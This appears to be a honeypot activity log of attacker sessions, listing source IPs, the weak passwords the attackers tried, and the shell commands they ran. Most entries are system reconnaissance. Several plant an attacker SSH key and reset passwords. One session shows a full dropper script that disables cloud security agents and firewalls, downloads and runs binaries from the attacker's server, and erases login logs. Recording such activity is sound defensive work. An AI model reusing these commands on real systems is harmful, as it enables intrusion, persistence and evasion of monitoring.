"CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output"

$ uname -s -v -n -m 2 > /dev/null

$ uname -m 2 > /dev/null

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1

🎭 reef_root_4 (170.64.199.191) — Sydney, Australia · 5 sessions · 20 cmds

2026-03-06 22:21 EST · as root/1234, root/12345678, root/admin

export → uname → cat (repeated export 5x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×5

$ uname -s -v -n -m 2 > /dev/null ×5

$ uname -m 2 > /dev/null ×5

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×5

🎭 clog_root_3 (68.183.15.50) — Amsterdam, Netherlands · 3 sessions · 12 cmds

2026-03-06 22:15 EST · as admin/123456, admin/admin123, admin/password

export → uname → cat (repeated export 3x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×3

$ uname -s -v -n -m 2 > /dev/null ×3

$ uname -m 2 > /dev/null ×3

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×3

🎭 scone_root_13 (138.68.167.73) — Slough, United Kingdom · 1 session · 4 cmds

2026-03-06 20:46 EST · as admin/123456

export → uname → cat

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output"

$ uname -s -v -n -m 2 > /dev/null

$ uname -m 2 > /dev/null

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1

🎭 cipher_root_74 (132.248.170.105) — Mexico City, Mexico · 1 session · 20 cmds

2026-03-06 18:17 EST · as test/123456

file attribute tampering → SSH key persistence → CPU profiling

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo -e "123456\nl0JN6REhR9U6\nl0JN6REhR9U6"|passwd|bash

$ Enter new UNIX password:

$ echo "123456\nl0JN6REhR9U6\nl0JN6REhR9U6\n"|passwd

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 tea_root_5 (143.110.162.49) — Slough, United Kingdom · 5 sessions · 20 cmds

2026-03-06 10:41 EST · as admin/admin, admin/admin123, admin/password

export → uname → cat (repeated export 5x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×5

$ uname -s -v -n -m 2 > /dev/null ×5

$ uname -m 2 > /dev/null ×5

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×5

🎭 fika_root_2 (155.4.245.222) — Stockholm, Sweden · 1 session · 20 cmds

2026-03-06 10:51 EST · as admin/password

file attribute tampering → SSH key persistence → CPU profiling

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo -e "password\n2iXnri79yMh8\n2iXnri79yMh8"|passwd|bash

$ Enter new UNIX password:

$ echo "password\n2iXnri79yMh8\n2iXnri79yMh8\n"|passwd

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 jade_root_18 (124.225.41.77) — Shanghai, China · 1 session · 20 cmds

2026-03-06 10:43 EST · as admin/password

file attribute tampering → SSH key persistence → CPU profiling

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo -e "password\n6ydIrVIjoQfM\n6ydIrVIjoQfM"|passwd|bash

$ Enter new UNIX password:

$ echo "password\n6ydIrVIjoQfM\n6ydIrVIjoQfM\n"|passwd

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 barbie_root_3 (170.64.164.237) — Sydney, Australia · 8 sessions · 32 cmds

2026-03-01 16:53 EST · as admin/admin, admin/admin123, admin/password

export → uname → cat (repeated export 8x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×8

$ uname -s -v -n -m 2 > /dev/null ×8

$ uname -m 2 > /dev/null ×8

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×8

🎭 eagle_sol (159.223.135.19) — North Bergen, United States · 16 sessions · 16 cmds

2026-03-06 08:43 EST · as admin/admin, admin/admin123, deploy/deploy

Ran uname 16x across 16 sessions — automated OS fingerprinting.

$ uname -s -v -n -r -m ×16

🎭 wraith_root_49 (36.64.174.98) — Jakarta, Indonesia · 1 session · 1 cmd

2026-03-06 06:35 EST · as root/admin

ip

$ /ip cloud print

🎭 rogue_root_51 (103.59.160.195) — Kediri, Indonesia · 2 sessions · 6 cmds

2026-03-05 01:11 EST · as root/12345678, root/admin

make executable → skhqwensw → ls

$ #!/bin/sh; ; wdir="/tmp"; for i in "/tmp" "/var/tmp" "/dev/shm" "/usr" "/bin" "/home" "/root"; do; if [ -w "$i" ]; then; wdir="$i"; break; fi; done; cd "$wdir" || exit 1; ; ; ; ; systemctl stop aegis >/dev/null 2>&1; systemctl disable aegis >/dev/null 2>&1; systemctl stop aliyun >/dev/null 2>&1; systemctl disable aliyun >/dev/null 2>&1; ; ; systemctl mask aegis >/dev/null 2>&1; systemctl mask aliyun >/dev/null 2>&1; systemctl daemon-reload; ; ; if command -v chattr >/dev/null 2>&1; then; chattr -R -i -a /usr/local/aegis/ >/dev/null 2>&1; fi; ; ; pkill -9 AliYunDun >/dev/null 2>&1; pkill -9 AliYunDunMonitor >/dev/null 2>&1; pkill -9 aegis_update >/dev/null 2>&1; pkill -9 CmsGoAgent >/dev/null 2>&1; ; ; rm -rf /usr/local/aegis >/dev/null 2>&1; rm -rf /etc/init.d/aegis >/dev/null 2>&1; ; ; mkdir -p /usr/local/aegis; if command -v chattr >/dev/null 2>&1; then; chattr +i /usr/local/aegis; fi; ; ; ; ; systemctl stop YDService >/dev/null 2>&1; systemctl disable YDService >/dev/null 2>&1; systemctl stop tat_agent >/dev/null 2>&1; systemctl disable tat_agent >/dev/null 2>&1; ; ; systemctl mask YDService >/dev/null 2>&1; systemctl mask tat_agent >/dev/null 2>&1; ; ; systemctl daemon-reload; ; ; if command -v chattr >/dev/null 2>&1; then; chattr -R -i -a /usr/local/qcloud/ >/dev/null 2>&1; fi; ; ; pkill -9 YDService >/dev/null 2>&1; pkill -9 YDLive >/dev/null 2>&1; ; ; rm -rf /usr/local/qcloud/YunJing >/dev/null 2>&1; rm -rf /usr/local/qcloud/stargate >/dev/null 2>&1; rm -rf /usr/local/qcloud/monitor >/dev/null 2>&1; rm -rf /usr/local/qcloud/tat_agent >/dev/null 2>&1; ; mkdir -p /usr/local/qcloud/YunJing; mkdir -p /usr/local/qcloud/tat_agent; if command -v chattr >/dev/null 2>&1; then; chattr +i /usr/local/qcloud/YunJing; chattr +i /usr/local/qcloud/tat_agent; fi; ; ; ; disable_firewall() {; systemctl stop firewalld ufw >/dev/null 2>&1; systemctl disable firewalld ufw >/dev/null 2>&1; service firewalld stop >/dev/null 2>&1; service ufw stop >/dev/null 2>&1; ; if command -v iptables >/dev/null 2>&1; then; iptables -P INPUT ACCEPT >/dev/null 2>&1; iptables -P FORWARD ACCEPT >/dev/null 2>&1; iptables -P OUTPUT ACCEPT >/dev/null 2>&1; iptables -F >/dev/null 2>&1; iptables -X >/dev/null 2>&1; iptables -t nat -F >/dev/null 2>&1; iptables -t nat -X >/dev/null 2>&1; fi; }; disable_firewall; ; download_and_run() {; url="$1"; filename="$2"; ; if [ -f "./$filename" ] && [ -x "./$filename" ]; then; setsid "./$filename" >/dev/null 2>&1 &; return 0; fi; ; dl_bin=""; dl_args=""; ; if command -v good >/dev/null 2>&1; then; dl_bin="good"; dl_args="--no-check-certificate -q $url -O $filename"; elif command -v cool >/dev/null 2>&1; then; dl_bin="cool"; dl_args="-skL $url -o $filename"; elif command -v wget >/dev/null 2>&1; then; dl_bin="wget"; dl_args="--no-check-certificate -q $url -O $filename"; elif command -v curl >/dev/null 2>&1; then; dl_bin="curl"; dl_args="-skL $url -o $filename"; fi; ; if [ -z "$dl_bin" ]; then; apt-get update >/dev/null 2>&1 && apt-get install -y wget curl >/dev/null 2>&1; yum install -y wget curl >/dev/null 2>&1; if command -v wget >/dev/null 2>&1; then; dl_bin="wget"; dl_args="--no-check-certificate -q $url -O $filename"; fi; fi; ; if [ -n "$dl_bin" ]; then; $dl_bin $dl_args >/dev/null 2>&1; if [ -f "$filename" ]; then; chmod +x "$filename"; setsid "./$filename" >/dev/null 2>&1 &; fi; fi; }; ; lock_tools() {; command -v chattr >/dev/null 2>&1 && chattr -i /usr/bin/wget /usr/bin/curl >/dev/null 2>&1; ; w_path=$(which wget 2>/dev/null); if [ -n "$w_path" ]; then; case "$w_path" in; *good*) ;;; *) mv "$w_path" "$(dirname "$w_path")/good" >/dev/null 2>&1 ;;; esac; fi; ; c_path=$(which curl 2>/dev/null); if [ -n "$c_path" ]; then; case "$c_path" in; *cool*) ;;; *) mv "$c_path" "$(dirname "$c_path")/cool" >/dev/null 2>&1 ;;; esac; fi; }; ; SERVER_IP="103.59.160.195"; download_and_run "http://$SERVER_IP/vos.txt" "system_update"; download_and_run "http://$SERVER_IP/vox.txt" "network_conf"; ; lock_tools; ; cleanup() {; for log in /var/log/wtmp /var/log/btmp /var/log/lastlog /var/log/syslog /var/log/auth.log; do; if [ -f "$log" ]; then; echo > "$log" 2>/dev/null; fi; done; rm -f "$0"; }; cleanup; ; rm -- "$0"; rm -f /root/vos.sh; rm -f /tmp.vos.sh; exit 0 ×2

↳ make executable

$ /bin/skhqwensw ×2

$ ls -la /var/run/gcc.pid ×2

🎭 spice_root_10 (139.59.60.181) — Bengaluru, India · 3 sessions · 12 cmds

2026-03-06 04:44 EST · as root/12345678, root/admin, root/qwerty

export → uname → cat (repeated export 3x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×3

$ uname -s -v -n -m 2 > /dev/null ×3

$ uname -m 2 > /dev/null ×3

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×3

🎭 cowboy_root (167.71.107.223) — Clifton, United States · 10 sessions · 40 cmds

2026-03-06 03:17 EST · as admin/123456, admin/admin, admin/admin123

export → uname → cat (repeated export 10x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×10

$ uname -s -v -n -m 2 > /dev/null ×10

$ uname -m 2 > /dev/null ×10

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×10

🎭 wok_root_33 (123.52.66.31) — Luoyang, China · 1 session · 20 cmds

2026-03-06 03:17 EST · as user/user

file attribute tampering → SSH key persistence → CPU profiling

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo -e "user\nT28A8GBmnK7H\nT28A8GBmnK7H"|passwd|bash

$ Enter new UNIX password:

$ echo "user\nT28A8GBmnK7H\nT28A8GBmnK7H\n"|passwd

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 barbie_root_7 (170.64.163.111) — Sydney, Australia · 5 sessions · 20 cmds

2026-03-05 19:24 EST · as root/1234, root/12345678, root/admin

export → uname → cat (repeated export 5x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×5

$ uname -s -v -n -m 2 > /dev/null ×5

$ uname -m 2 > /dev/null ×5

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×5

🎭 kimchi_pi_2 (112.173.117.101) — Busan, South Korea · 1 session · 1 cmd

2026-03-05 18:58 EST · as pi/pi

execute payload

$ ./oinasf; dd if=/proc/self/exe bs=22 count=1 || while read i; do echo $i; done < /proc/self/exe || cat /proc/self/exe;

↳ execute payload

🎭 star_root_17 (162.243.236.194) — Secaucus, United States · 3 sessions · 12 cmds

2026-03-05 15:57 EST · as root/12345678, root/admin, root/qwerty

export → uname → cat (repeated export 3x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×3

$ uname -s -v -n -m 2 > /dev/null ×3

$ uname -m 2 > /dev/null ×3

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×3

🎭 scone_root_14 (144.126.199.147) — Slough, United Kingdom · 3 sessions · 12 cmds

2026-03-05 15:56 EST · as root/12345678, root/admin, root/qwerty

export → uname → cat (repeated export 3x)

